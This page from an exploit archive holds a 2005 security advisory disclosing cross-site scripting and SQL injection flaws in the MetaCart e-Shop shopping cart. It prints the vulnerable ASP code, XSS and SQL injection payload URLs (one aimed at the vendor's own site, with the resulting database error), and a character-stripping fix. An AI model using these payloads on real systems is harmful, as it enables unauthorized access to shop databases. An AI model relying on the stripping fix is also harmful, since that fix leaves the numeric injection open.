exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2005.13

Echo Security Advisory 2005.13
Posted Jul 8, 2005
Authored by Echo Security, Dedi Dwianto | Site echo.or.id

MetaCart e-Shop is susceptible to SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 5b1752bdc31faa1879fd8ae6525e8e6cfcd592f1d37994bb7c3c22ced414591b

Echo Security Advisory 2005.13

Change Mirror Download


____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/

.OR.ID
ECHO_ADV_13$2005

---------------------------------------------------------------------------
Multiple Vulnerabilities in MetaCart e-Shop
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: May, 16th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv13-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MetaCart e-Shop
version: All version of MetaCart e shop Products
url : http://www.metalinks.com
Author: MetaLinks Online Design
Description:

MetaCart e-Shop Is shopping cart application for small businesses
and support ms SQL,MS Access and MySQL.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross-Site Scripting (XSS)

File productsByCategory.asp

http://[url]/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script>

Problem Script productsByCategory.asp

--------------
strCatalog_name = Request.QueryString("strCatalog_NAME")
...
...
strParam = Response.Write (rsCatalog("catalogID")) &strCatalog_NAME=Response.Write
(Server.URLEncode(rsCatalog("catalogName"))) &rsCatalog("catalogName")

--------------

B. SQL Injection

File productsByCategory.asp
http://[url]/mcartlite/productsByCategory.asp?strSubCatalogID=2'(Sql Injection)

Problem Script

---------------
intCatalogID = Request.QueryString("intCatalogID")
...
...
' Build SQL String using the parameters
strSQL = "SELECT productID,productName,productPrice FROM products WHERE catalogID = '"&strParam&"'"

---------------

Ex : http://www.metalinks.com/mcartlite/productsByCategory.asp?strSubCatalogID=2'having 1=1--
Error :
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '1=1--''.
/mcartlite/productsByCategory.asp, line 114

File strCatalog_NAME
http://[url]/mcartlite/product.asp?intProdID=1'(SQL Injection)

Problem Script product.asp line 102

---------------
intProdID = Request.QueryString("intProdID")
...
...
Set rsProdInfo = Conn.Execute("SELECT * FROM " & _
"products where productID="&intProdID)
if rsProdInfo.EOF then
Response.Write "Product Number " & intProdID & _
" does not exist."
---------------

C. Solution
Using Replace String For Filter some character
- productsByCategory.asp

* Find
intCatalogID = Request.QueryString("intCatalogID")
After,add
intCatalogID = Replace(intCatalogID,"'","")
* Find
strCatalog_name = Request.QueryString("strCatalog_NAME")
After,add
strCatalog_name = Replace(strCatalog_NAME,"<","")

- product.asp

* Find
intProdID = Request.QueryString("intProdID")
After,add
intProdID = Replace(intProdID,"'","")



---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close